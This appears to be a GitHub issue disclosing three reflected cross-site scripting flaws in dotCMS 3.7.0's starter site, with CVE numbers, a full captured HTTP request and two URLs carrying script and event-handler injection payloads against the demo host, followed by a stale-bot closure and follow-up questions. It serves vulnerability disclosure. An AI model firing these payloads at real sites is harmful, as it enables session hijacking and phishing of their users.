Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Multiple XSS in Starter Site Implementation #10643

Closed
Belladona-c0re opened this issue Feb 6, 2017 · 3 comments
Closed

Multiple XSS in Starter Site Implementation #10643

Belladona-c0re opened this issue Feb 6, 2017 · 3 comments

Comments

@Belladona-c0re
Copy link

Belladona-c0re commented Feb 6, 2017
edited
Loading

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.dotcms.com/dotCMS/myAccount
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

dispatch=editUserAddress&userId=%24%7BmyAccountForm.userId%7D&addressID=0q6rt0"><script>alert(1)<%2fscript>bewiz&prefix=other&firstName=Admin&lastName=User&suffix=&title=&emailAddress=admin%40dotcms.com&password=&newPassword=
captura3

XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1
captura2

XSS CVE-2017-5877 :

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500

captura

How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
@stale
Copy link

stale bot commented Sep 28, 2019

This issue has been automatically marked as stale because it has not had activity within the past 90 days. It will be closed in 30 days no further activity occurs. Thank you.

@stale stale bot added the wontfix label Sep 28, 2019
@stale stale bot closed this as completed Oct 28, 2019
@NicoleG25
Copy link

NicoleG25 commented Jan 8, 2020
edited
Loading

Was this vulnerability ever addressed ?
Note that CVE-2017-5877 was assigned.

@wezell wezell changed the title Multiple XSS in dotCMS - 3.7.0 Multiple XSS in Starter Site Implementation Jan 8, 2020
@NicoleG25
Copy link

@wezell @fabrizzio-dotCMS Any response to the above ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Belladona-c0re @NicoleG25